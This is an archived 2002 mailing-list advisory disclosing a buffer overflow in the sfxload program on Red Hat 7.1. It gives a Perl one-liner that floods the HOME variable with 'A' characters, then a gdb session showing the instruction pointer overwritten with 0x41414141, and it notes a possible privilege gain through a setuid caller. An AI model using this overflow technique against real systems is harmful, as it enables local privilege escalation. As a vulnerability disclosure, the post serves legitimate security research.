Vendor : http://members.tripod.de/iwai/awedrv.html Program: sfxload OS : RH 7.1 Version: 0.4.3 SUID : No SGID : No Issue : This may get called by an suid helper binary which would allow a normal user to gain some more privs. -------------------------------------------------------------------------- Details: [raven] /u1/cores/testing/bin> export HOME=`perl -e 'print "A" x 10235'` /* I just set HOME to be [10235] A's */ [raven] /u1/cores/testing/bin> sfxload Segmentation fault (core dumped) /* When xfsload is run it reads in the HOME var and cores!!! */ [raven] /u1/cores/testing/bin/sfxload> gdb /bin/sfxload /* gdb */ GNU gdb 5.0rh-5 Red Hat Linux 7.1 Copyright 2001 Free Software Foundation, Inc. GDB is free software, covered by the GNU General Public License, and you are welcome to change it and/or distribute copies of it under certain conditions. Type "show copying" to see the conditions. There is absolutely no warranty for GDB. Type "show warranty" for details. This GDB was configured as "i386-redhat-linux"...(no debugging symbols found)... (gdb) core core Core was generated by `AAAAAAAA'. Program terminated with signal 11, Segmentation fault. Reading symbols from /lib/i686/libm.so.6...done. Loaded symbols for /lib/i686/libm.so.6 Reading symbols from /lib/i686/libc.so.6...done. Loaded symbols for /lib/i686/libc.so.6 Reading symbols from /lib/ld-linux.so.2...done. Loaded symbols for /lib/ld-linux.so.2 #0 0x41414141 in ?? () (gdb) bt #0 0x41414141 in ?? () Cannot access memory at address 0x41414141 (gdb) /* EIP gets killed */ -- Regards, l0rt ------------------------------------------------------------ "The only way to get rid of temptation is to give in to it."
This archive was generated by hypermail 2b30 : Wed Jan 02 2002 - 21:25:20 PST